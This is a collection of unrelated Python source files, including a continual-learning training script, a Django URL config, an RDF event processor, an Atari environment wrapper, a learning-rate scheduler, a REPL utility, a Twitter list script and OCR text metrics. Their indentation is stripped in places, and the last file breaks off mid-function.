net.layer4[0].act['conv_0'], net.layer4[0].act['conv_1'], net.layer4[1].act['conv_0'], net.layer4[1].act['conv_1']])
batch_list = [10,10,10,10,10,10,10,10,50,50,50,100,100,100,100,100,100] #scaled
# network arch
stride_list = [1, 1,1,1,1, 2,1,1,1, 2,1,1,1, 2,1,1,1]
map_list = [32, 32,32,32,32, 32,16,16,16, 16,8,8,8, 8,4,4,4]
in_channel = [ 3, 20,20,20,20, 20,40,40,40, 40,80,80,80, 80,160,160,160]
pad = 1
sc_list=[5,9,13]
p1d = (1, 1, 1, 1)
mat_final=[] # list containing GPM Matrices
mat_list=[]
mat_sc_list=[]
for i in range(len(stride_list)):
        ksz = 3  # every activation captured in this loop feeds a 3x3 convolution
bsz=batch_list[i]
st = stride_list[i]
k=0
s=compute_conv_output_size(map_list[i],ksz,stride_list[i],pad)
mat = np.zeros((ksz*ksz*in_channel[i],s*s*bsz))
act = F.pad(act_list[i], p1d, "constant", 0).detach().cpu().numpy()
for kk in range(bsz):
for ii in range(s):
for jj in range(s):
mat[:,k]=act[kk,:,st*ii:ksz+st*ii,st*jj:ksz+st*jj].reshape(-1)
k +=1
mat_list.append(mat)
# For Shortcut Connection
if i in sc_list:
k=0
s=compute_conv_output_size(map_list[i],1,stride_list[i])
mat = np.zeros((1*1*in_channel[i],s*s*bsz))
act = act_list[i].detach().cpu().numpy()
for kk in range(bsz):
for ii in range(s):
for jj in range(s):
mat[:,k]=act[kk,:,st*ii:1+st*ii,st*jj:1+st*jj].reshape(-1)
k +=1
mat_sc_list.append(mat)
ik=0
for i in range (len(mat_list)):
mat_final.append(mat_list[i])
if i in [6,10,14]:
mat_final.append(mat_sc_list[ik])
ik+=1
print('-'*30)
print('Representation Matrix')
print('-'*30)
for i in range(len(mat_final)):
print ('Layer {} : {}'.format(i+1,mat_final[i].shape))
print('-'*30)
return mat_final
def update_GPM (model, mat_list, threshold, feature_list=[],):
print ('Threshold: ', threshold)
if not feature_list:
# After First Task
for i in range(len(mat_list)):
activation = mat_list[i]
U,S,Vh = np.linalg.svd(activation, full_matrices=False)
# criteria (Eq-5)
sval_total = (S**2).sum()
sval_ratio = (S**2)/sval_total
r = np.sum(np.cumsum(sval_ratio)<threshold[i]) #+1
feature_list.append(U[:,0:r])
else:
for i in range(len(mat_list)):
activation = mat_list[i]
U1,S1,Vh1=np.linalg.svd(activation, full_matrices=False)
sval_total = (S1**2).sum()
# Projected Representation (Eq-8)
act_hat = activation - np.dot(np.dot(feature_list[i],feature_list[i].transpose()),activation)
U,S,Vh = np.linalg.svd(act_hat, full_matrices=False)
# criteria (Eq-9)
sval_hat = (S**2).sum()
sval_ratio = (S**2)/sval_total
accumulated_sval = (sval_total-sval_hat)/sval_total
r = 0
for ii in range (sval_ratio.shape[0]):
if accumulated_sval < threshold[i]:
accumulated_sval += sval_ratio[ii]
r += 1
else:
break
if r == 0:
print ('Skip Updating GPM for layer: {}'.format(i+1))
continue
# update GPM
Ui=np.hstack((feature_list[i],U[:,0:r]))
if Ui.shape[1] > Ui.shape[0] :
feature_list[i]=Ui[:,0:Ui.shape[0]]
else:
feature_list[i]=Ui
print('-'*40)
print('Gradient Constraints Summary')
print('-'*40)
for i in range(len(feature_list)):
print ('Layer {} : {}/{}'.format(i+1,feature_list[i].shape[1], feature_list[i].shape[0]))
print('-'*40)
return feature_list
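# Illustrative sketch (not part of the original code): running update_GPM on random activation
# matrices. Shapes and thresholds are invented; the model argument is unused by update_GPM,
# so None is passed, and an explicit empty feature_list starts a fresh memory.
def _demo_update_gpm():
    rng = np.random.RandomState(0)
    mat_list = [rng.randn(27, 200), rng.randn(180, 200)]
    feature_list = update_GPM(None, mat_list, threshold=np.array([0.95, 0.95]), feature_list=[])
    # Each entry is a column-orthonormal basis: rows = layer input dim, cols = kept directions.
    return [f.shape for f in feature_list]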
def main(args):
tstart=time.time()
## Device Setting
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
    ## Load the 5-Datasets benchmark
from dataloader import five_datasets as data_loader
data,taskcla,inputsize=data_loader.get(pc_valid=args.pc_valid)
acc_matrix=np.zeros((5,5))
criterion = torch.nn.CrossEntropyLoss()
task_id = 0
task_list = []
for k,ncla in taskcla:
# specify threshold hyperparameter
threshold = np.array([0.965] * 20)
print('*'*100)
print('Task {:2d} ({:s})'.format(k,data[k]['name']))
print('*'*100)
xtrain=data[k]['train']['x']
ytrain=data[k]['train']['y']
xvalid=data[k]['valid']['x']
yvalid=data[k]['valid']['y']
xtest =data[k]['test']['x']
ytest =data[k]['test']['y']
task_list.append(k)
lr = args.lr
best_loss=np.inf
print ('-'*40)
print ('Task ID :{} | Learning Rate : {}'.format(task_id, lr))
print ('-'*40)
if task_id==0:
model = ResNet18(taskcla,20).to(device) # base filters: 20
best_model=get_model(model)
feature_list =[]
optimizer = optim.SGD(model.parameters(), lr=lr)
for epoch in range(1, args.n_epochs+1):
# Train
clock0=time.time()
train(args, model, device, xtrain, ytrain, optimizer, criterion, k)
clock1=time.time()
tr_loss,tr_acc = test(args, model, device, xtrain, ytrain, criterion, k)
print('Epoch {:3d} | Train: loss={:.3f}, acc={:5.1f}% | time={:5.1f}ms |'.format(epoch,\
tr_loss,tr_acc, 1000*(clock1-clock0)),end='')
# Validate
valid_loss,valid_acc = test(args, model, device, xvalid, yvalid, criterion, k)
print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss, valid_acc),end='')
# Adapt lr
if valid_loss<best_loss:
best_loss=valid_loss
best_model=get_model(model)
patience=args.lr_patience
print(' *',end='')
else:
patience-=1
if patience<=0:
lr/=args.lr_factor
print(' lr={:.1e}'.format(lr),end='')
if lr<args.lr_min:
print()
break
patience=args.lr_patience
adjust_learning_rate(optimizer, epoch, args)
print()
set_model_(model,best_model)
# Test
print ('-'*40)
test_loss, test_acc = test(args, model, device, xtest, ytest, criterion, k)
print('Test: loss={:.3f} , acc={:5.1f}%'.format(test_loss,test_acc))
# Memory Update
mat_list = get_representation_matrix_ResNet18 (model, device, xtrain, ytrain)
feature_list = update_GPM (model, mat_list, threshold, feature_list)
else:
optimizer = optim.SGD(model.parameters(), lr=args.lr)
feature_mat = []
# Projection Matrix Precomputation
for i in range(len(feature_list)):
Uf=torch.Tensor(np.dot(feature_list[i],feature_list[i].transpose())).to(device)
print('Layer {} - Projection Matrix shape: {}'.format(i+1,Uf.shape))
feature_mat.append(Uf)
print ('-'*40)
for epoch in range(1, args.n_epochs+1):
# Train
clock0=time.time()
train_projected(args, model,device,xtrain, ytrain,optimizer,criterion,feature_mat,k)
clock1=time.time()
tr_loss, tr_acc = test(args, model, device, xtrain, ytrain,criterion,k)
print('Epoch {:3d} | Train: loss={:.3f}, acc={:5.1f}% | time={:5.1f}ms |'.format(epoch,\
tr_loss, tr_acc, 1000*(clock1-clock0)),end='')
# Validate
valid_loss,valid_acc = test(args, model, device, xvalid, yvalid, criterion,k)
print(' Valid: loss={:.3f}, acc={:5.1f}% |'.format(valid_loss, valid_acc),end='')
# Adapt lr
if valid_loss<best_loss:
best_loss=valid_loss
best_model=get_model(model)
patience=args.lr_patience
print(' *',end='')
else:
patience-=1
if patience<=0:
lr/=args.lr_factor
print(' lr={:.1e}'.format(lr),end='')
if lr<args.lr_min:
print()
break
patience=args.lr_patience
adjust_learning_rate(optimizer, epoch, args)
print()
set_model_(model,best_model)
# Test
test_loss, test_acc = test(args, model, device, xtest, ytest, criterion,k)
print('Test: loss={:.3f} , acc={:5.1f}%'.format(test_loss,test_acc))
# Memory Update
mat_list = get_representation_matrix_ResNet18 (model, device, xtrain, ytrain)
feature_list = update_GPM (model, mat_list, threshold, feature_list)
# save accuracy
jj = 0
for ii in np.array(task_list)[0:task_id+1]:
xtest =data[ii]['test']['x']
ytest =data[ii]['test']['y']
_, acc_matrix[task_id,jj] = test(args, model, device, xtest, ytest,criterion,ii)
jj +=1
print('Accuracies =')
for i_a in range(task_id+1):
print('\t',end='')
for j_a in range(acc_matrix.shape[1]):
print('{:5.1f}% '.format(acc_matrix[i_a,j_a]),end='')
print()
# update task id
task_id +=1
print('-'*50)
# Simulation Results
print ('Task Order : {}'.format(np.array(task_list)))
print ('Final Avg Accuracy: {:5.2f}%'.format(acc_matrix[-1].mean()))
bwt=np.mean((acc_matrix[-1]-np.diag(acc_matrix))[:-1])
print ('Backward transfer: {:5.2f}%'.format(bwt))
print('[Elapsed time = {:.1f} ms]'.format((time.time()-tstart)*1000))
print('-'*50)
# Plots
array = acc_matrix
df_cm = pd.DataFrame(array, index = [i for i in ["T1","T2","T3","T4","T5"]],
columns = [i for i in ["T1","T2","T3","T4","T5"]])
sn.set(font_scale=1.4)
sn.heatmap(df_cm, annot=True, annot_kws={"size": 10})
plt.show()
if __name__ == "__main__":
# Training parameters
parser = argparse.ArgumentParser(description='5 datasets with GPM')
parser.add_argument('--batch_size_train', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--batch_size_test', type=int, default=64, metavar='N',
help='input batch size for testing (default: 64)')
    parser.add_argument('--n_epochs', type=int, default=100, metavar='N',
                        help='number of training epochs/task (default: 100)')
parser.add_argument('--seed', type=int, default=37, metavar='S',
help='random seed (default: 37)')
parser.add_argument('--pc_valid',default=0.05,type=float,
help='fraction of training data used for validation')
# Optimizer parameters
    parser.add_argument('--lr', type=float, default=0.1, metavar='LR',
                        help='learning rate (default: 0.1)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
    parser.add_argument('--lr_min', type=float, default=1e-3, metavar='LRM',
                        help='minimum lr rate (default: 1e-3)')
    parser.add_argument('--lr_patience', type=int, default=5, metavar='LRP',
                        help='hold before decaying lr (default: 5)')
    parser.add_argument('--lr_factor', type=int, default=3, metavar='LRF',
                        help='lr decay factor (default: 3)')
# CUDA parameters
parser.add_argument('--gpu', type=str, default="0", metavar='GPU',
help="GPU ID for single GPU training")
args = parser.parse_args()
print('='*100)
print('Arguments =')
for arg in vars(args):
print('\t'+arg+':',getattr(args,arg))
print('='*100)
main(args)
|
the-stack_106_16844
|
from django.conf.urls import patterns, url
from views import *
urlpatterns = patterns('',
url(r'^$', contact_list, name='contacts'),
url(r'^list/$', contact_list, name='contact_list'),
url(r'^add/$', contact_add, name='contact_add'),
url(r'^edit/$', contact_edit, name='contact_edit'),
url(r'^delete/$', contact_delete, name='contact_delete'),
)
|
the-stack_106_16845
|
"""
Encapsulate the methodology to process a segment from the moves-api.
Builds rdf triples based on:
http://motools.sourceforge.net/event/event.html
"""
import logging
from rhobot.components.storage import StoragePayload
from move_bot.components.update_service.interval_handler import IntervalHandler
from move_bot.components.update_service.location_handler import LocationHandler
from move_bot.components.namespace import EVENT, MOVES_SEGMENT
from rdflib.namespace import RDFS, DC, DCTERMS
logger = logging.getLogger(__name__)
class ProcessSegment:
"""
Callable that encapsulates the work that needs to be done to insert an event into the data store inside a promise.
These steps are:
If there is an event that already exists that needs to be updated.
Update the contents of that event.
Else:
Create the new event.
"""
def __init__(self, segment, owner, xmpp):
"""
Construct the callable.
:param segment: segment to process.
:param owner: owner of the installation
:param xmpp: bot details
"""
self._segment = segment
self._scheduler = xmpp['rho_bot_scheduler']
self._storage_client = xmpp['rho_bot_storage_client']
self._promise = None
self._publisher = xmpp['rho_bot_rdf_publish']
self._representation_manager = xmpp['rho_bot_representation_manager']
self._owner = owner
self._node_id = None
self.xmpp = xmpp
self.interval_handler = IntervalHandler(xmpp)
self.location_handler = LocationHandler(xmpp, owner)
def __call__(self, *args):
"""
Executable method for the instance. This will look up to see if the object needs to be updated or created, then
instantiate the correct promise chain which will accomplish the task.
:param args:
:return:
"""
logger.info('Processing segment: %s' % self._segment)
self._promise = self._scheduler.promise()
# Check in the database to see if there is anything that currently has the segment defined in it
payload = StoragePayload()
payload.add_type(EVENT.Event)
payload.add_property(RDFS.seeAlso, MOVES_SEGMENT[self._segment['startTime']])
self._storage_client.find_nodes(payload).then(self._handle_find_result)
return self._promise
def _finish_process(self, session=None):
"""
Common exit point for the promise chain.
:param session:
:return:
"""
self._promise.resolved(session)
return None
def _handle_find_result(self, result):
if result.results:
self._node_id = result.results[0].about
update_promise = self._scheduler.defer(self.start_session).then(self._find_place)
update_promise = update_promise.then(self._get_interval).then(self._update_node)
update_promise.then(self._finish_process, lambda s: self._promise.rejected(s))
return update_promise
else:
create_promise = self._scheduler.defer(self.start_session).then(self._find_place)
create_promise = create_promise.then(self._create_interval).then(self._create_node)
create_promise.then(self._finish_process, lambda s: self._promise.rejected(s))
return create_promise
def start_session(self):
return dict()
def _find_place(self, session):
"""
Find the place associated with the segment.
:param session:
:return:
"""
logger.debug('Finding place: %s' % session)
location_promise = self.location_handler(self._segment['place']).then(
self._scheduler.generate_promise_handler(self._update_session, session, 'location'))
return location_promise
def _get_interval(self, session):
"""
Get the event node to be updated, then update the interval object, and put the result into the session value.
:param session: session variable.
:return:
"""
logger.debug('Get Interval: %s' % session)
def update_interval(result):
interval_reference = result.references.get(str(EVENT.time), None)
if interval_reference:
interval_reference = interval_reference[0]
interval_promise = self.interval_handler(interval_reference,
self._segment['startTime'],
self._segment['endTime'])
interval_promise = interval_promise.then(
self._scheduler.generate_promise_handler(self._update_session, session, 'interval'))
return interval_promise
payload = StoragePayload()
payload.about = self._node_id
promise = self._storage_client.get_node(payload).then(update_interval)
return promise
def _create_interval(self, session):
"""
Create a new interval and add it to the session variable.
:param session:
:return:
"""
logger.debug('Create Interval: %s' % session)
interval_promise = self.interval_handler(None, self._segment['startTime'], self._segment['endTime'])
interval_promise = interval_promise.then(
self._scheduler.generate_promise_handler(self._update_session, session, 'interval'))
return interval_promise
@staticmethod
def _update_session(interval_result, session, key):
"""
Process the results of the creation.
"""
session[key] = interval_result
return session
def _create_node(self, session):
"""
Create a new node based and add additional properties based on the session.
:param session:
:return:
"""
logger.debug('Creating Node')
payload = self._convert_segment_to_payload(session)
# Only set the title when first creating it. The update might override a field that has been changed by the
# user.
place_name = self._segment['place'].get('name', 'Unknown')
payload.add_property(key=DC.title, value=place_name)
promise = self._storage_client.create_node(payload).then(
self._scheduler.generate_promise_handler(self._publish_modifications, created=True)).then(
lambda s: s.results[0].about)
return promise
def _update_node(self, session):
"""
Method to be used in a deferred that will update the node responsible for execution.
:return:
"""
logger.info('Updating Node')
payload = self._convert_segment_to_payload(session)
# Update that about field so that the node can be updated.
payload.about = self._node_id
promise = self._storage_client.update_node(payload).then(
self._scheduler.generate_promise_handler(self._publish_modifications, created=False)).then(
lambda s: s.results[0].about)
return promise
def _convert_segment_to_payload(self, session):
"""
Convert the segment details into a payload object.
:return:
"""
payload = StoragePayload()
payload.add_type(EVENT.Event)
payload.add_reference(key=EVENT.agent, value=self._owner)
payload.add_reference(key=DCTERMS.creator, value=self._representation_manager.representation_uri)
payload.add_property(RDFS.seeAlso, MOVES_SEGMENT[self._segment['startTime']])
if session['location']:
payload.add_reference(key=EVENT.place, value=session['location'][0])
if session['interval']:
payload.add_reference(key=EVENT.time, value=session['interval'][0])
return payload
def _publish_modifications(self, result, created=True):
self._publisher.publish_all_results(result, created=created)
return result
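# Illustrative sketch (not part of the original module): the shape of a moves-api segment this
# class reads. Only the keys accessed above (startTime, endTime and a place with an optional
# name) are shown, and every value is invented.
EXAMPLE_SEGMENT = {
    'startTime': '20180101T080000Z',
    'endTime': '20180101T093000Z',
    'place': {'name': 'Coffee Shop'},
}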
|
the-stack_106_16847
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cv2
from atari import AtariPlayer
from atari_wrapper import FrameStack, MapState, FireResetEnv
def get_player(rom,
image_size,
viz=False,
train=False,
frame_skip=1,
context_len=1):
env = AtariPlayer(
rom,
frame_skip=frame_skip,
viz=viz,
live_lost_as_eoe=train,
max_num_frames=60000)
env = FireResetEnv(env)
env = MapState(env, lambda im: cv2.resize(im, image_size))
if not train:
# in training, context is taken care of in expreplay buffer
env = FrameStack(env, context_len)
return env
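# Illustrative sketch (not part of the original module): typical evaluation-time usage of
# get_player. The ROM path is a placeholder; any ROM supported by AtariPlayer would do.
def _demo_get_player():
    return get_player('breakout.bin', image_size=(84, 84), viz=False, train=False,
                      frame_skip=4, context_len=4)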
|
the-stack_106_16848
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
class LRScheduler(object):
"""Base class of a learning rate scheduler.
    A scheduler returns a new learning rate based on the number of epochs that have been performed.
Parameters
----------
    base_lr : float, optional
        The initial learning rate.
    step : int or list of int, optional
        Epoch(s) at which the learning rate is decayed by `factor`; a single int is expanded
        to every multiple of that value.
    factor : float, optional
        The multiplicative decay applied once for each step that has been passed.
    warmup_epoch : int
        Number of warmup epochs used before this scheduler starts decay.
    warmup_begin_lr : float
        If using warmup, the learning rate from which it starts warming up.
    warmup_mode : string
        Warmup can be done in two modes.
        'linear' mode gradually increases lr with each epoch in equal increments.
        'constant' mode keeps lr at warmup_begin_lr for the warmup epochs.
"""
def __init__(self, base_lr=0.01, step=(30, 60), factor=0.1,
warmup_epoch=0, warmup_begin_lr=0, warmup_mode='linear'):
self.base_lr = base_lr
self.learning_rate = base_lr
        if isinstance(step, (tuple, list)):
self.step = step
else:
self.step = [step*(i+1) for i in range(20)]
self.factor = factor
assert isinstance(warmup_epoch, int)
self.warmup_epoch = warmup_epoch
self.warmup_final_lr = base_lr
self.warmup_begin_lr = warmup_begin_lr
        if self.warmup_begin_lr > self.warmup_final_lr:
            raise ValueError("base_lr has to be no lower than warmup_begin_lr")
        if self.warmup_epoch < 0:
            raise ValueError("warmup_epoch has to be non-negative")
if warmup_mode not in ['linear', 'constant']:
raise ValueError("Supports only linear and constant modes of warmup")
self.warmup_mode = warmup_mode
def update(self, num_epoch):
if self.warmup_epoch > num_epoch:
# warmup strategy
if self.warmup_mode == 'linear':
self.learning_rate = self.warmup_begin_lr + (self.warmup_final_lr - self.warmup_begin_lr) * \
num_epoch / self.warmup_epoch
elif self.warmup_mode == 'constant':
self.learning_rate = self.warmup_begin_lr
else:
count = sum([1 for s in self.step if s <= num_epoch])
self.learning_rate = self.base_lr * pow(self.factor, count)
return self.learning_rate
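# --- Minimal usage sketch (added for illustration; not part of the original
# module). With base_lr=0.1, step=(30, 60), factor=0.1 and a 5-epoch linear
# warmup from 0.01, update() ramps the lr from 0.01 toward 0.1 during epochs
# 0-4, holds 0.1 until epoch 29, drops it to 0.01 at epoch 30 and to 0.001 at
# epoch 60.
if __name__ == '__main__':
    scheduler = LRScheduler(base_lr=0.1, step=(30, 60), factor=0.1,
                            warmup_epoch=5, warmup_begin_lr=0.01)
    for epoch in (0, 2, 4, 10, 30, 60, 90):
        print(epoch, scheduler.update(epoch))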
|
the-stack_106_16849
|
"""
Utility for creating a Python repl.
::
from prompt_toolkit.contrib.repl import embed
embed(globals(), locals(), vi_mode=False)
"""
# Warning: don't import `print_function` from __future__, otherwise we will
# also get the print_function inside `eval` on Python 2.7.
from __future__ import unicode_literals
from pygments import highlight
from pygments.formatters.terminal256 import Terminal256Formatter
from pygments.lexers import PythonTracebackLexer
from prompt_toolkit import AbortAction, Exit
from prompt_toolkit.contrib.python_input import PythonCommandLineInterface, PythonStyle, AutoCompletionStyle
from six import exec_
import sys
import os
import traceback
__all__ = ('PythonRepl', 'embed')
class PythonRepl(PythonCommandLineInterface):
def start_repl(self, startup_paths=None):
"""
Start the Read-Eval-Print Loop.
:param startup_paths: Array of paths to Python files.
"""
self._execute_startup(startup_paths)
# Run REPL loop until Exit.
try:
while True:
# Read
document = self.read_input(
on_abort=AbortAction.RETRY,
on_exit=AbortAction.RAISE_EXCEPTION)
line = document.text
if line and not line.isspace():
try:
# Eval and print.
self._execute(line)
except KeyboardInterrupt as e: # KeyboardInterrupt doesn't inherit from Exception.
self._handle_keyboard_interrupt(e)
except Exception as e:
self._handle_exception(e)
self.current_statement_index += 1
except Exit:
pass
def _execute_startup(self, startup_paths):
"""
Load and execute startup file.
"""
if startup_paths:
for path in startup_paths:
with open(path, 'r') as f:
code = compile(f.read(), path, 'exec')
exec_(code, self.get_globals(), self.get_locals())
def _execute(self, line):
"""
Evaluate the line and print the result.
"""
if line[0:1] == '!':
# Run as shell command
os.system(line[1:])
else:
# Try eval first
try:
result = eval(line, self.get_globals(), self.get_locals())
locals = self.get_locals()
locals['_'] = locals['_%i' % self.current_statement_index] = result
if result is not None:
try:
self.stdout.write('Out[%i]: %r\n' % (self.current_statement_index, result))
except UnicodeDecodeError:
# In Python 2: `__repr__` should return a bytestring,
# so to put it in a unicode context could raise an
# exception that the 'ascii' codec can't decode certain
# characters. Decode as utf-8 in that case.
self.stdout.write('Out[%i]: %s\n' % (self.current_statement_index, repr(result).decode('utf-8')))
# If not a valid `eval` expression, run using `exec` instead.
except SyntaxError:
exec_(line, self.get_globals(), self.get_locals())
self.stdout.write('\n')
self.stdout.flush()
def _handle_exception(self, e):
# Instead of just calling ``traceback.format_exc``, we take the
# traceback and skip the bottom calls of this framework.
t, v, tb = sys.exc_info()
tblist = traceback.extract_tb(tb)[3:]
l = traceback.format_list(tblist)
if l:
l.insert(0, "Traceback (most recent call last):\n")
l.extend(traceback.format_exception_only(t, v))
tb = ''.join(l)
# Format exception and write to output.
self.stdout.write(highlight(tb, PythonTracebackLexer(), Terminal256Formatter()))
self.stdout.write('%s\n\n' % e)
self.stdout.flush()
def _handle_keyboard_interrupt(self, e):
self.stdout.write('\rKeyboardInterrupt\n\n')
self.stdout.flush()
def embed(globals=None, locals=None, vi_mode=False, history_filename=None, no_colors=False,
autocompletion_style=AutoCompletionStyle.POPUP_MENU, startup_paths=None, always_multiline=False):
"""
    Call this to embed a Python shell at the current point in your program.
It's similar to `IPython.embed` and `bpython.embed`. ::
from prompt_toolkit.contrib.repl import embed
embed(globals(), locals(), vi_mode=False)
:param vi_mode: Boolean. Use Vi instead of Emacs key bindings.
"""
globals = globals or {}
locals = locals or globals
def get_globals():
return globals
def get_locals():
return locals
cli = PythonRepl(get_globals, get_locals, vi_mode=vi_mode, history_filename=history_filename,
style=(None if no_colors else PythonStyle),
autocompletion_style=autocompletion_style, always_multiline=always_multiline)
cli.start_repl(startup_paths=startup_paths)
|
the-stack_106_16850
|
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test bitcoin-cli"""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal
class TestBitcoinCli(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
"""Main test logic"""
self.log.info("Compare responses from getinfo RPC and `supermario-cli getinfo`")
cli_get_info = self.nodes[0].cli.getinfo()
rpc_get_info = self.nodes[0].getinfo()
assert_equal(cli_get_info, rpc_get_info)
if __name__ == '__main__':
TestBitcoinCli().main()
|
the-stack_106_16851
|
from django.conf.urls import url
from paying_for_college.views import *
urlpatterns = [
# url(r'^$',
# BuildComparisonView.as_view(), name='worksheet'),
url(r'^offer/$',
OfferView.as_view(), name='offer'),
url(r'^offer/test/$',
OfferView.as_view(), {'test': True}, name='offer_test'),
url(r'^api/email/$', EmailLink.as_view(), name='email'),
url(r'^feedback/$',
FeedbackView.as_view(),
name='pfc-feedback'),
url(r'^about-this-tool/$',
BaseTemplateView.as_view(template_name="technote.html"),
name='pfc-technote'),
url(r'^api/search-schools.json',
school_search_api,
name='school_search'),
url(r'^api/program/([^/]+)/$',
ProgramRepresentation.as_view(),
name='program-json'),
url(r'^api/constants/$',
ConstantsRepresentation.as_view(),
name='constants-json'),
url(r'^api/national-stats/$',
StatsRepresentation.as_view(),
name='national-stats-generic-json'),
url(r'^api/national-stats/(?P<id_pair>[^/]+)/$',
StatsRepresentation.as_view(),
name='national-stats-json'),
url(r'^api/expenses/$',
ExpenseRepresentation.as_view(),
name='expenses-json'),
url(r'^api/verify/$',
VerifyView.as_view(),
name='verify'),
url(r'^api/school/(\d+)/$',
SchoolRepresentation.as_view(),
name='school-json'),
]
|
the-stack_106_16853
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import division
##
# Copyright (C) Benjamin D. McGinnes, 2013-2017
# [email protected]
# OpenPGP/GPG key: 0x321E4E2373590E5D
#
# Version: 0.0.1
#
# BTC: 1KvKMVnyYgLxU1HnLQmbWaMpDx3Dz15DVU
#
#
#
# Requirements:
#
# * Python 3.4 or later.
#
# Options and notes:
#
# Usage:
#
# __name__ <list-slug> user1 user2 user3 etc.
#
##
from license import __author__
from license import __copyright__
from license import __license__
__version__ = "0.0.1"
from license import __bitcoin__
import math
import sys
from twython import Twython, TwythonError
from config import *
twitter = Twython(APP_KEY, APP_SECRET, OAUTH_TOKEN, OAUTH_TOKEN_SECRET)
"""
Add one or more usernames to a list owned by the script owner.
"""
cred = twitter.verify_credentials()
l = len(sys.argv)
if l == 1:
listname = input("Enter the ID or name (slug) of the list: ")
targetx = input("Enter usernames or IDs to add (separate by spaces): ")
elif l == 2:
listname = sys.argv[1]
targetx = input("Enter usernames or IDs to add (separate by spaces): ")
elif l >= 3:
listname = sys.argv[1]
targetx = " ".join(sys.argv[2:l])
try:
    listid = int(listname)
except ValueError:
    listid = str(listname)
owner = cred["screen_name"]
targetz = targetx.split()
targety = []
lt = len(targetz)
for i in range(lt):
    if targetz[i].isnumeric():
target1 = int(targetz[i])
target2 = str(targetz[i])
else:
target1 = str(targetz[i])
target2 = None
if target2 is None:
target = target1
else:
try:
t1a = twitter.show_user(user_id=target1)
target = t1a["screen_name"]
        except TwythonError:
            target = target2
targety.append(target)
datachecklist = []
if lt == 1:
try:
data = twitter.add_list_member(slug=listid, owner_screen_name=owner,
screen_name=target)
except TwythonError as e:
print(e)
data = None
if data is not None:
datacheck = True
else:
datacheck = False
elif 2 <= lt <= 100:
targets = ", ".join(targety)
try:
data = twitter.create_list_members(slug=listid,
owner_screen_name=owner,
user_id=targets)
except TwythonError as e:
print(e)
data = None
if data is not None:
datacheck = True
else:
datacheck = False
elif lt > 100:
t0 = lt / 100
t1 = math.floor(t0)
t2 = t1 * 100
t3 = lt - t2
for i in range(t1):
targets = ", ".join(targety[(i * 100):((i + 1) * 100)])
try:
data = twitter.create_list_members(slug=listid,
owner_screen_name=owner,
user_id=targets)
except TwythonError as e:
print(e)
data = None
if data is not None:
datachecklist.append(targets)
else:
pass
    # Add the remaining (lt - t2) users, if any, in one final batch.
    if t3 > 0:
        targets = ", ".join(targety[t2:])
        try:
            data = twitter.create_list_members(slug=listid,
                                               owner_screen_name=owner,
                                               user_id=targets)
        except TwythonError as e:
            print(e)
            data = None
        if data is not None:
            datachecklist.append(targets)
if len(datachecklist) > 0:
datacheck = True
else:
datacheck = False
targeted = ", ".join(targety)
if datacheck is True:
print("""{0} added to https://twitter.com{1} which now has {2} members.
""".format(targeted, data['uri'], data['member_count']))
else:
print("No users added to any list.")
|
the-stack_106_16854
|
import re
from difflib import SequenceMatcher
from rapidfuzz import string_metric
def cal_true_positive_char(pred, gt):
"""Calculate correct character number in prediction.
Args:
pred (str): Prediction text.
gt (str): Ground truth text.
Returns:
true_positive_char_num (int): The true positive number.
"""
all_opt = SequenceMatcher(None, pred, gt)
true_positive_char_num = 0
for opt, _, _, s2, e2 in all_opt.get_opcodes():
if opt == 'equal':
true_positive_char_num += (e2 - s2)
else:
pass
return true_positive_char_num
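# Worked example (added comment; not in the original module): SequenceMatcher
# aligns 'hello' against 'hallo' as h / [e->a] / llo, so the 'equal' opcodes
# cover 1 + 3 = 4 ground-truth characters and
# cal_true_positive_char('hello', 'hallo') returns 4.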
def count_matches(pred_texts, gt_texts):
"""Count the various match number for metric calculation.
Args:
pred_texts (list[str]): Predicted text string.
gt_texts (list[str]): Ground truth text string.
Returns:
match_res: (dict[str: int]): Match number used for
metric calculation.
"""
match_res = {
'gt_char_num': 0,
'pred_char_num': 0,
'true_positive_char_num': 0,
'gt_word_num': 0,
'match_word_num': 0,
'match_word_ignore_case': 0,
'match_word_ignore_case_symbol': 0
}
comp = re.compile('[^A-Z^a-z^0-9^\u4e00-\u9fa5]')
norm_ed_sum = 0.0
for pred_text, gt_text in zip(pred_texts, gt_texts):
if gt_text == pred_text:
match_res['match_word_num'] += 1
gt_text_lower = gt_text.lower()
pred_text_lower = pred_text.lower()
if gt_text_lower == pred_text_lower:
match_res['match_word_ignore_case'] += 1
gt_text_lower_ignore = comp.sub('', gt_text_lower)
pred_text_lower_ignore = comp.sub('', pred_text_lower)
if gt_text_lower_ignore == pred_text_lower_ignore:
match_res['match_word_ignore_case_symbol'] += 1
match_res['gt_word_num'] += 1
# normalized edit distance
edit_dist = string_metric.levenshtein(pred_text_lower_ignore,
gt_text_lower_ignore)
norm_ed = float(edit_dist) / max(1, len(gt_text_lower_ignore),
len(pred_text_lower_ignore))
norm_ed_sum += norm_ed
# number to calculate char level recall & precision
match_res['gt_char_num'] += len(gt_text_lower_ignore)
match_res['pred_char_num'] += len(pred_text_lower_ignore)
true_positive_char_num = cal_true_positive_char(
